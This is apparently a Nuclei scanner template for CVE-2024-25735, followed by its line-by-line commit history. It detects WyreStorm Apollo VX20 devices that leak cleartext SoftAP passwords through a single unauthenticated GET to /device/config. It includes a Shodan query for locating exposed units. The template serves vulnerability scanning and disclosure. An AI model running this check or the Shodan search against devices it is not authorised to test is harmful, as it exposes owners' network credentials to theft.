nuclei-templates/http/cves/2024/CVE-2024-25735.yaml

id: CVE-2024-25735

info:
  name: WyreStorm Apollo VX20 - Information Disclosure
  author: johnk3r
  severity: high
  description: |
    An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
  reference:
    - https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
    - https://packetstormsecurity.com/files/cve/CVE-2024-25735
  metadata:
    verified: true
    max-request: 1
    vendor: wyrestorm
    product: apollo vx20
    shodan-query: ssl:"WyreStorm Apollo VX20"
  tags: packetstorm,cve,cve2024,wyrestorm,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/device/config"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"password":'
          - '"softAp":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207a882963d4a3f8ed561c7c8c0babf15f2b40b9dcd1aa09112156fa30a9e53b89022100a0a1e3ee792bbbe946761e559cb03fe55fb5b61de9e9eafa674e7cefeaa34a68:922c64590222798bb761d5b6d8e72950
Create CVE-2024-25735.yaml 2024-02-12 22:32:40 +00:00			`id: CVE-2024-25735`
minor update 2024-02-13 04:32:11 +00:00
Create CVE-2024-25735.yaml 2024-02-12 22:32:40 +00:00			`info:`
updated name 2024-02-13 04:38:52 +00:00			`name: WyreStorm Apollo VX20 - Information Disclosure`
Create CVE-2024-25735.yaml 2024-02-12 22:32:40 +00:00			`author: johnk3r`
			`severity: high`
minor update 2024-02-13 04:32:11 +00:00			`description: \|`
			`An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.`
Create CVE-2024-25735.yaml 2024-02-12 22:32:40 +00:00			`reference:`
			`- https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt`
minor update 2024-02-13 04:32:11 +00:00			`- https://packetstormsecurity.com/files/cve/CVE-2024-25735`
Create CVE-2024-25735.yaml 2024-02-12 22:32:40 +00:00			`metadata:`
			`verified: true`
			`max-request: 1`
minor update 2024-02-13 04:32:11 +00:00			`vendor: wyrestorm`
			`product: apollo vx20`
Create CVE-2024-25735.yaml 2024-02-12 22:32:40 +00:00			`shodan-query: ssl:"WyreStorm Apollo VX20"`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`tags: packetstorm,cve,cve2024,wyrestorm,info-leak`
Create CVE-2024-25735.yaml 2024-02-12 22:32:40 +00:00
			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/device/config"`

Update CVE-2024-25735.yaml 2024-02-12 22:34:42 +00:00			`matchers-condition: and`
Create CVE-2024-25735.yaml 2024-02-12 22:32:40 +00:00			`matchers:`
			`- type: word`
			`words:`
minor update 2024-02-13 04:32:11 +00:00			`- '"password":'`
			`- '"softAp":'`
			`condition: and`
Update CVE-2024-25735.yaml 2024-02-12 22:34:42 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- 'application/json'`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 4a0a0047304502207a882963d4a3f8ed561c7c8c0babf15f2b40b9dcd1aa09112156fa30a9e53b89022100a0a1e3ee792bbbe946761e559cb03fe55fb5b61de9e9eafa674e7cefeaa34a68:922c64590222798bb761d5b6d8e72950`